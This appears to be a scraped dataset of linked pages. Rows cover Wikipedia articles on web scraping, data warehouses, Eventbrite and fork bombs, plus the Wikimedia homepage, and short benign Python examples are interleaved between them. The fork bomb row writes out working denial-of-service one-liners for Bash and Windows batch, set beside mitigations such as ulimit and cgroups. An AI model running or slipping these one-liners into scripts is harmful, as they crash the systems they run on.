There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. |
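As a sketch of the data-feed monitoring mentioned above, the snippet below reads a hypothetical JSON endpoint. The URL and the field names ("name", "price") are assumptions for illustration only; a real feed's shape would need to be inspected first.
import requests
# Hypothetical JSON price feed; many sites expose data this way to their own front end.
FEED_URL = "https://example.com/api/prices.json"
resp = requests.get(FEED_URL, timeout=10)
resp.raise_for_status()
items = resp.json()   # assumed here to be a list of {"name": ..., "price": ...} records
for item in items[:10]:
    print(item.get("name"), item.get("price"))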
545 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_warehouse | In computing, a data warehouse (DW or DWH), also known as an enterprise data warehouse (EDW), is a system used for reporting and data analysis and is considered a core component of business intelligence. 1 Data warehouses are central repositories of integrated data from one or more disparate sources. They store current and historical data in a single place and are used for creating reports. This is beneficial for companies as it enables them to interrogate and draw insights from their data and make decisions. 2 The data stored in the warehouse is uploaded from the operational systems (such as marketing or sales). The data may pass through an operational data store and may require data cleansing for additional operations to ensure data quality before it is used in the data warehouse for reporting. Extract, transform, load (ETL) and extract, load, transform (ELT) are the two main approaches used to build a data warehouse system. The typical extract, transform, load (ETL) based data warehouse uses staging, data integration, and access layers to house its key functions. The staging layer or staging database stores raw data extracted from each of the disparate source data systems. The integration layer integrates disparate data sets by transforming the data from the staging layer, often storing this transformed data in an operational data store (ODS) database. The integrated data are then moved to yet another database, often called the data warehouse database, where the data is arranged into hierarchical groups, often called dimensions, and into facts and aggregate facts. The combination of facts and dimensions is sometimes called a star schema. The access layer helps users retrieve data. 3 The main source of the data is cleansed, transformed, catalogued, and made available for use by managers and other business professionals for data mining, online analytical processing, market research and decision support. 4 However, the means to retrieve and analyze data, to extract, transform, and load data, and to manage the data dictionary are also considered essential components of a data warehousing system. Many references to data warehousing use this broader context. Thus, an expanded definition of data warehousing includes business intelligence tools, tools to extract, transform, and load data into the repository, and tools to manage and retrieve metadata. ELT-based data warehousing gets rid of a separate ETL tool for data transformation. Instead, it maintains a staging area inside the data warehouse itself. In this approach, data gets extracted from heterogeneous source systems and is then directly loaded into the data warehouse, before any transformation occurs. All necessary transformations are then handled inside the data warehouse itself. Finally, the manipulated data gets loaded into target tables in the same data warehouse. A data warehouse maintains a copy of information from the source transaction systems. This architectural complexity provides the opportunity to: The environment for data warehouses and marts includes the following: In regard to the source systems listed above, R. Kelly Rainer states, "A common source for the data in data warehouses is the company's operational databases, which can be relational databases". 5 Regarding data integration, Rainer states, "It is necessary to extract data from source systems, transform them, and load them into a data mart or warehouse". 
5 Rainer discusses storing data in an organization's data warehouse or data marts. 5 Metadata is data about data. "IT personnel need information about data sources; database, table, and column names; refresh schedules; and data usage measures". 5 Today, the most successful companies are those that can respond quickly and flexibly to market changes and opportunities. A key to this response is the effective and efficient use of data and information by analysts and managers. 5 A "data warehouse" is a repository of historical data that is organized by the subject to support decision-makers in the organization. 5 Once data is stored in a data mart or warehouse, it can be accessed. A data mart is a simple form of a data warehouse that is focused on a single subject (or functional area), hence it draws data from a limited number of sources such as sales, finance or marketing. Data marts are often built and controlled by a single department within an organization. The sources could be internal operational systems, a central data warehouse, or external data. 6 Denormalization is the norm for data modeling techniques in this system. Given that data marts generally cover only a subset of the data contained in a data warehouse, they are often easier and faster to implement. Types of data marts include dependent, independent, and hybrid data marts. clarification needed Online analytical processing (OLAP) is characterized by a relatively low volume of transactions. Queries are often very complex and involve aggregations. For OLAP systems, response time is an effectiveness measure. OLAP applications are widely used by Data Mining techniques. OLAP databases store aggregated, historical data in multi-dimensional schemas (usually star schemas). OLAP systems typically have a data latency of a few hours, as opposed to data marts, where latency is expected to be closer to one day. The OLAP approach is used to analyze multidimensional data from multiple sources and perspectives. The three basic operations in OLAP are Roll-up (Consolidation), Drill-down, and Slicing and Dicing. Online transaction processing (OLTP) is characterized by a large number of short on-line transactions (INSERT, UPDATE, DELETE). OLTP systems emphasize very fast query processing and maintaining data integrity in multi-access environments. For OLTP systems, effectiveness is measured by the number of transactions per second. OLTP databases contain detailed and current data. The schema used to store transactional databases is the entity model (usually 3NF). 7 Normalization is the norm for data modeling techniques in this system. Predictive analytics is about finding and quantifying hidden patterns in the data using complex mathematical models that can be used to predict future outcomes. Predictive analysis is different from OLAP in that OLAP focuses on historical data analysis and is reactive in nature, while predictive analysis focuses on the future. These systems are also used for customer relationship management (CRM). The concept of data warehousing dates back to the late 1980s 8 when IBM researchers Barry Devlin and Paul Murphy developed the "business data warehouse". In essence, the data warehousing concept was intended to provide an architectural model for the flow of data from operational systems to decision support environments. The concept attempted to address the various problems associated with this flow, mainly the high costs associated with it. 
In the absence of a data warehousing architecture, an enormous amount of redundancy was required to support multiple decision support environments. In larger corporations, it was typical for multiple decision support environments to operate independently. Though each environment served different users, they often required much of the same stored data. The process of gathering, cleaning and integrating data from various sources, usually from long-term existing operational systems (usually referred to as legacy systems), was typically in part replicated for each environment. Moreover, the operational systems were frequently reexamined as new decision support requirements emerged. Often new requirements necessitated gathering, cleaning and integrating new data from "data marts" that was tailored for ready access by users. Additionally, with the publication of The IRM Imperative (Wiley & Sons, 1991) by James M. Kerr, the idea of managing and putting a dollar value on an organization's data resources and then reporting that value as an asset on a balance sheet became popular. In the book, Kerr described a way to populate subject-area databases from data derived from transaction-driven systems to create a storage area where summary data could be further leveraged to inform executive decision-making. This concept served to promote further thinking of how a data warehouse could be developed and managed in a practical way within any enterprise. Key developments in the early years of data warehousing: A fact is a value, or measurement, which represents a fact about the managed entity or system. Facts, as reported by the reporting entity, are said to be at raw level; e.g., in a mobile telephone system, if a BTS (base transceiver station) receives 1,000 requests for traffic channel allocation, allocates for 820, and rejects the remaining, it would report three facts or measurements to a management system: Facts at the raw level are further aggregated to higher levels in various dimensions to extract more service or business-relevant information from it. These are called aggregates or summaries or aggregated facts. For instance, if there are three BTS in a city, then the facts above can be aggregated from the BTS to the city level in the network dimension. For example: There are three or more leading approaches to storing data in a data warehouse; the most important are the dimensional approach and the normalized approach. The dimensional approach refers to Ralph Kimball's approach, in which it is stated that the data warehouse should be modeled using a dimensional model (star schema). The normalized approach, also called the 3NF model (Third Normal Form), refers to Bill Inmon's approach, in which it is stated that the data warehouse should be modeled using an E-R model (normalized model). 22 In a dimensional approach, transaction data is partitioned into "facts", which are generally numeric transaction data, and "dimensions", which are the reference information that gives context to the facts. For example, a sales transaction can be broken up into facts such as the number of products ordered and the total price paid for the products, and into dimensions such as order date, customer name, product number, order ship-to and bill-to locations, and salesperson responsible for receiving the order. A key advantage of a dimensional approach is that the data warehouse is easier for the user to understand and to use. Also, the retrieval of data from the data warehouse tends to operate very quickly. 
16 Dimensional structures are easy to understand for business users, because the structure is divided into measurements (facts) and context (dimensions). Facts are related to the organization's business processes and operational system, whereas the dimensions surrounding them contain context about the measurement (Kimball, Ralph 2008). Another advantage offered by the dimensional model is that it does not involve a relational database every time. Thus, this type of modeling technique is very useful for end-user queries in the data warehouse. The model of facts and dimensions can also be understood as a data cube, 23 where the dimensions are the categorical coordinates in a multi-dimensional cube and the fact is a value corresponding to the coordinates. The main disadvantages of the dimensional approach are the following: In the normalized approach, the data in the data warehouse are stored following, to a degree, database normalization rules. Tables are grouped together by subject areas that reflect general data categories (e.g., data on customers, products, finance, etc.). The normalized structure divides data into entities, which creates several tables in a relational database. When applied in large enterprises, the result is dozens of tables that are linked together by a web of joins. Furthermore, each of the created entities is converted into separate physical tables when the database is implemented (Kimball, Ralph 2008). The main advantage of this approach is that it is straightforward to add information into the database. Some disadvantages of this approach are that, because of the number of tables involved, it can be difficult for users to join data from different sources into meaningful information and to access the information without a precise understanding of the sources of data and of the data structure of the data warehouse. Both normalized and dimensional models can be represented in entity relationship diagrams as both contain joined relational tables. The difference between the two models is the degree of normalization (also known as Normal Forms). These approaches are not mutually exclusive, and there are other approaches. Dimensional approaches can involve normalizing data to a degree (Kimball, Ralph 2008). In Information-Driven Business, 24 Robert Hillard proposes an approach to comparing the two approaches based on the information needs of the business problem. The technique shows that normalized models hold far more information than their dimensional equivalents (even when the same fields are used in both models) but this extra information comes at the cost of usability. The technique measures information quantity in terms of information entropy and usability in terms of the Small Worlds data transformation measure. 25 In the bottom-up approach, data marts are first created to provide reporting and analytical capabilities for specific business processes. These data marts can then be integrated to create a comprehensive data warehouse. The data warehouse bus architecture is primarily an implementation of "the bus", a collection of conformed dimensions and conformed facts, which are dimensions that are shared (in a specific way) between facts in two or more data marts. 26 The top-down approach is designed using a normalized enterprise data model. "Atomic" data, that is, data at the greatest level of detail, are stored in the data warehouse. Dimensional data marts containing data needed for specific business processes or specific departments are created from the data warehouse. 
27 Data warehouses often resemble the hub and spokes architecture. Legacy systems feeding the warehouse often include customer relationship management and enterprise resource planning, generating large amounts of data. To consolidate these various data models, and facilitate the extract, transform, load (ETL) process, data warehouses often make use of an operational data store, the information from which is parsed into the actual data warehouse. To reduce data redundancy, larger systems often store the data in a normalized way. Data marts for specific reports can then be built on top of the data warehouse. A hybrid (also called ensemble) data warehouse database is kept in third normal form to eliminate data redundancy. A normal relational database, however, is not efficient for business intelligence reports where dimensional modelling is prevalent. Small data marts can shop for data from the consolidated warehouse and use the filtered, specific data for the fact tables and dimensions required. The data warehouse provides a single source of information from which the data marts can read, providing a wide range of business information. The hybrid architecture allows a data warehouse to be replaced with a master data management repository where operational (not static) information could reside. The data vault modeling components follow hub and spokes architecture. This modeling style is a hybrid design, consisting of the best practices from both third normal form and star schema. The data vault model is not a true third normal form, and breaks some of its rules, but it is a top-down architecture with a bottom-up design. The data vault model is geared to be strictly a data warehouse. It is not geared to be end-user accessible, which, when built, still requires the use of a data mart or star schema-based release area for business purposes. There are basic features that define the data in the data warehouse that include subject orientation, data integration, time-variant, nonvolatile data, and data granularity. Unlike the operational systems, the data in the data warehouse revolves around the subjects of the enterprise. Subject orientation is not database normalization. Subject orientation can be really useful for decision-making. Gathering the required objects is called subject-oriented. The data found within the data warehouse is integrated. Since it comes from several operational systems, all inconsistencies must be removed. Consistency is required in naming conventions, measurement of variables, encoding structures, physical attributes of data, and so forth. While operational systems reflect current values as they support day-to-day operations, data warehouse data represents a long time horizon (up to 10 years), which means it stores mostly historical data. It is mainly meant for data mining and forecasting. (E.g., if a user is searching for a buying pattern of a specific customer, the user needs to look at data on the current and past purchases.) 28 The data in the data warehouse is read-only, which means it cannot be updated, created, or deleted (unless there is a regulatory or statutory obligation to do so). 29 In the data warehouse process, data can be aggregated in data marts at different levels of abstraction. The user may start looking at the total sale units of a product in an entire region. Then the user looks at the states in that region. Finally, they may examine the individual stores in a certain state. 
Therefore, typically, the analysis starts at a higher level and drills down to lower levels of details. 28 With data virtualization, the data used remains in its original locations and real-time access is established to allow analytics across multiple sources, creating a virtual data warehouse. This can aid in resolving some technical difficulties such as compatibility problems when combining data from various platforms, lowering the risk of error caused by faulty data, and guaranteeing that the newest data is used. Furthermore, avoiding the creation of a new database containing personal information can make it easier to comply with privacy regulations. However, with data virtualization, the connection to all necessary data sources must be operational as there is no local copy of the data, which is one of the main drawbacks of the approach. 30 The different methods used to construct/organize a data warehouse specified by an organization are numerous. The hardware utilized, software created and data resources specifically required for the correct functionality of a data warehouse are the main components of the data warehouse architecture. All data warehouses have multiple phases in which the requirements of the organization are modified and fine-tuned. 31 Operational systems are optimized for the preservation of data integrity and speed of recording of business transactions through use of database normalization and an entity relationship model. Operational system designers generally follow Codd's 12 rules of database normalization to ensure data integrity. Fully normalized database designs (that is, those satisfying all Codd rules) often result in information from a business transaction being stored in dozens to hundreds of tables. Relational databases are efficient at managing the relationships between these tables. The databases have very fast insert/update performance because only a small amount of data in those tables is affected each time a transaction is processed. To improve performance, older data are usually periodically purged from operational systems. Data warehouses are optimized for analytic access patterns. Analytic access patterns generally involve selecting specific fields and rarely if ever use select *, which selects all fields/columns, as is more common in operational databases. Because of these differences in access patterns, operational databases (loosely, OLTP) benefit from the use of a row-oriented DBMS, whereas analytics databases (loosely, OLAP) benefit from the use of a column-oriented DBMS. Unlike operational systems, which maintain a snapshot of the business, data warehouses generally maintain an infinite history, which is implemented through ETL processes that periodically migrate data from the operational systems over to the data warehouse. These terms refer to the level of sophistication of a data warehouse: |
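The ETL flow, star-schema layout, and roll-up operation described in the data warehouse row above can be illustrated with a small, self-contained Python sketch. This is a minimal illustration only: the table names, column names, and figures are invented, and pandas plus SQLite stand in for a real warehouse platform rather than representing any particular product.

import sqlite3
import pandas as pd

# --- Extract: raw rows as they might arrive from an operational system (invented data).
staging = pd.DataFrame({
    "order_id":   [1, 2, 3, 4],
    "order_date": ["2024-01-05", "2024-01-06", "2024-02-01", "2024-02-02"],
    "product":    ["Widget", "Widget", "Gadget", "Gadget"],
    "region":     ["West", "East", "West", "East"],
    "amount":     [19.99, 19.99, 34.50, 34.50],
})

# --- Transform: cleanse and conform the data (the integration / ODS step).
staging["order_date"] = pd.to_datetime(staging["order_date"])
staging["month"] = staging["order_date"].dt.to_period("M").astype(str)

# Split into a star schema: one fact table plus a descriptive dimension table.
dim_product = staging[["product"]].drop_duplicates().reset_index(drop=True)
dim_product["product_key"] = dim_product.index
fact_sales = staging.merge(dim_product, on="product")[
    ["order_id", "month", "region", "product_key", "amount"]
]

# --- Load: write the star schema into the warehouse database.
with sqlite3.connect("warehouse.db") as conn:
    dim_product.to_sql("dim_product", conn, if_exists="replace", index=False)
    fact_sales.to_sql("fact_sales", conn, if_exists="replace", index=False)

    # Roll-up (consolidation): aggregate facts up the month/region dimensions.
    rollup = pd.read_sql_query(
        "SELECT month, region, SUM(amount) AS total "
        "FROM fact_sales GROUP BY month, region", conn)
    print(rollup)

# Drill-down is the reverse direction: the same facts grouped at a finer grain.
detail = fact_sales.groupby(["month", "region", "product_key"], as_index=False)["amount"].sum()
print(detail)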
546 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Eventbrite | Eventbrite is an American event management and ticketing website. The service allows users to browse, create, and promote local events. The service charges a fee to event organizers in exchange for online ticketing services, unless the event is free. 2 In September or October 2023, Eventbrite changed their pricing plans to limit free events to 25 tickets before they would begin to charge organizers fees. 3 Launched in 2006 and headquartered in San Francisco, Eventbrite opened their first international office in the United Kingdom in 2012. The company has local offices in Nashville, London, Cork, Amsterdam, Dublin, Berlin, Melbourne, Mendoza, Madrid, and São Paulo. 2 The company went public on the New York Stock Exchange on September 20, 2018, under the ticker symbol EB. 4 Eventbrite was founded in 2006 by Kevin Hartz (Co-Founder and Executive Chairman), Julia Hartz (Co-Founder and CEO), and Renaud Visage (Co-Founder and CTO). The company was the first major player in this market in the US. 5 Prior to his position at the company, Kevin Hartz was involved with PayPal and was the Co-Founder and CEO of Xoom Corporation, an international money transfer company. Julia Hartz, wife of Kevin, was raised in Santa Cruz, CA. After studying broadcasting at Pepperdine University, she became a creative executive at FX Network in Los Angeles. Soon after the two became engaged, she moved to the Bay Area and helped co-found Eventbrite. citation needed On March 18, 2011, Eventbrite raised $50 million in Series E financing led by Tiger Global. 6 On April 22, 2013, Eventbrite raised another $60 million in growth capital financing led by Tiger Global, and including T. Rowe Price. 7 On March 13, 2014, Eventbrite raised a private equity round of $60 million, 8 and on September 1, 2017, the company raised $134 million in a Series G funding round. This brought their total funding to $334 million. Previous funding involved firms including Sequoia Capital, DAG Ventures and Tenaya Capital. 9 In 2016, Julia became the CEO of Eventbrite, while Kevin took the role of executive chairman. 10 In March 2017, Eventbrite purchased D.C.-based event tech startup Nvite for an undisclosed sum. 11 On June 9, 2017, Eventbrite purchased Ticketfly from Pandora for $200 million. 12 The acquisition was meant to strengthen Eventbrite's position in the live music market, but according to observers, executives were still struggling to integrate Ticketfly as of 2019. 13 In April 2018, Eventbrite acquired the Spanish ticketing service Ticketea, citing its events discovery platform and "robust ecosystem of third-party integrations" as being advantageous. 14 Later that month, Eventbrite was subjected to criticism over an update to its merchants' agreement, which specified that the service had the right to attend and record footage of any aspect of an event for any purpose, and that event organizers were "responsible for obtaining, at your own cost, all third party permissions, clearances, and licenses necessary to secure Eventbrite the permissions and rights to do so". Following public backlash, Eventbrite chose to remove the passage entirely. The company stated that it wanted the option to "work with individual organizers to secure video and photos at their events for marketing and promotional purposes", but admitted that the clauses were too broadly worded. 
15 In August 2018, Picatic, a Vancouver-based ticketing and event registration platform, was acquired by Eventbrite. 16 17 In April 2020, during the coronavirus pandemic, which was causing a drastic drop in in-person events, Eventbrite laid off around 45% of its employees, which at that point numbered between 1,000 and 1,100. 13 Reportedly, online events had amounted to less than 10% of the company's revenue in 2019. 13 In November 2020, the company acquired ToneDen, a social media marketing service based in Los Angeles. 18 In September or October 2023, the company revamped their pricing plans. They no longer offered fully free services for larger free events. They created a limit of 25 tickets to remain inside a fully free tier, and events with more tickets would be charged for services. 3 On March 18, 2011, Eventbrite raised $50 million in Series E financing led by Tiger Global. 6 On April 22, 2013, Eventbrite raised another $60 million in growth capital financing led by Tiger Global, and including T. Rowe Price. 19 On August 23, 2018, the company filed for a $200 million IPO. 4 The company's biggest shareholder is Tiger Global Management, with Sequoia Capital and the Hartzes also owning significant shares. 20 In 2019, Eventbrite laid off 8% of their workforce to cut costs amid worries of an economic downturn. It also planned to relocate about 30% of the remaining roles, including moving certain development roles to Spain and India from Argentina and the U.S. The company added that it would relocate nearly all of the customer support and operations roles to locations outside the U.S. 21 |
547 | https://en.wikipedia.org/wiki/Web_scraping | https://wikimediafoundation.org/ | The nonprofit Wikimedia Foundation provides the essential infrastructure for free knowledge. We host Wikipedia, the free online encyclopedia, created, edited, and verified by volunteers around the world, as well as many other vital community projects. All of which is made possible thanks to donations from individuals like you. We welcome anyone who shares our vision to join us in collecting and sharing knowledge that fully represents human diversity. 1 You made it. It is yours to use. For free. That means you can use it, adapt it, or share what you find on Wikimedia sites. Just do not write your own bio, or copy-paste it into your homework. 2 We do not sell your email address or any of your personal information to third parties. More information about our privacy practices is available at the Wikimedia Foundation privacy policy, donor privacy policy, and data retention guidelines. 3 Readers verify the facts. Articles are collaboratively created and edited by a community of volunteers using reliable sources, so no single person or company owns a Wikipedia article. The Wikimedia Foundation does not write or edit, but you and everyone you know can help. 4 The word “wiki” refers to a website built using collaborative editing software. Projects with no past or existing affiliation with Wikipedia or the Wikimedia Foundation, such as Wikileaks and wikiHow, also use the term. Although these sites also use “wiki” in their name, they have nothing to do with Wikimedia. 280,000 editors contribute to Wikimedia projects every month 100 million media files on Wikimedia Commons and counting 1.5 billion unique devices access Wikimedia projects every month We conduct our own research and partner with researchers worldwide to address change in society and technology. From site reliability to machine learning, our open-source technology makes Wikipedia faster, more reliable, and more accessible worldwide. We fight to protect everyone’s right to access free and open knowledge. Our volunteers build tools, share photos, write articles, and are working to connect all the knowledge that exists. Free encyclopedia written in over 300 languages by volunteers around the world. The world’s largest free-to-use library of illustrations, photos, drawings, videos and music. The nineteenth edition of the global event will take place in Katowice, Poland (the 2024 European City of Science), from 7–10 August. The Foundation supports challenges to laws in Texas and Florida that jeopardize Wikipedia’s community-led governance model and the right to freedom of expression. Throughout history, knowledge has been controlled by a powerful few. Wikipedia needs knowledge from all languages and cultures. The internet has become the default for accessing information, yet women, people of color, and the global south remain underrepresented. We invite you to help correct history. As a nonprofit, Wikipedia and our related free knowledge projects are powered primarily through donations. 
The Wikimedia Foundation, Inc. is a nonprofit charitable organization dedicated to encouraging the growth, development and distribution of free, multilingual content, and to providing the full content of these wiki-based projects to the public free of charge. |
548 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Fork_bomb | In computing, a fork bomb (also called rabbit virus) is a denial-of-service (DoS) attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation. Around 1978, an early variant of a fork bomb called wabbit was reported to run on a System/360. It may have descended from a similar attack called RABBITS reported from 1969 on a Burroughs 5500 at the University of Washington. 1 Fork bombs operate both by consuming CPU time in the process of forking, and by saturating the operating system's process table. 2 3 A basic implementation of a fork bomb is an infinite loop that repeatedly launches new copies of itself. In Unix-like operating systems, fork bombs are generally written to use the fork system call. 3 As forked processes are also copies of the first program, once they resume execution from the next address at the frame pointer, they continue forking endlessly within their own copy of the same infinite loop; this has the effect of causing an exponential growth in processes. As modern Unix systems generally use a copy-on-write resource management technique when forking new processes, 4 a fork bomb generally will not saturate such a system's memory. Microsoft Windows operating systems do not have an equivalent functionality to the Unix fork system call; 5 a fork bomb on such an operating system must therefore create a new process instead of forking from an existing one, for example with a batch file that pipes itself into itself (the well-known %0|%0 construct); one variant writes that command into a .cmd file, which is then executed. 6 A classic example of a fork bomb is one written in Unix shell, :(){ :|:& };:, possibly dating back to 1999, 7 which can be more easily understood as fork() { fork | fork & }; fork. In it, a function (fork) is defined as calling itself (fork), then piping (|) its result into itself, all in a background job (&). The code using a colon : as the function name is not valid in a shell as defined by POSIX, which only permits alphanumeric characters and underscores in function names. 8 However, its usage is allowed in GNU Bash as an extension. 9 As a fork bomb's mode of operation is entirely encapsulated by creating new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own. On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit -u 30 would limit the affected user to a maximum of thirty owned processes. 10 On PAM-enabled systems, this limit can also be set in /etc/security/limits.conf, 11 and on BSD, the system administrator can put limits in /etc/login.conf. 12 Modern Linux systems also allow finer-grained fork bomb prevention through cgroups and process number (PID) controllers. 13 |
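The fork bomb row above mentions limiting the number of processes a user may own (ulimit -u, limits.conf, cgroups). The same soft limit can also be set from inside a Python process on Unix-like systems via the standard resource module; the cap of 30 below simply mirrors the ulimit example and is purely illustrative, and RLIMIT_NPROC is not available on every platform.

import resource

# Current (soft, hard) limits on the number of processes this user may own (Unix-only).
soft, hard = resource.getrlimit(resource.RLIMIT_NPROC)
print("current limits:", soft, hard)

# Lower the soft limit to 30, mirroring `ulimit -u 30`; never exceed the hard limit.
new_soft = 30 if hard == resource.RLIM_INFINITY else min(30, hard)
resource.setrlimit(resource.RLIMIT_NPROC, (new_soft, hard))
print("new limits:", resource.getrlimit(resource.RLIMIT_NPROC))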
549 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Computer_vision_web-page_analysis | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as XPath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quickly it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 A newer approach uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular web scraping tools include the following. BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web-search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the 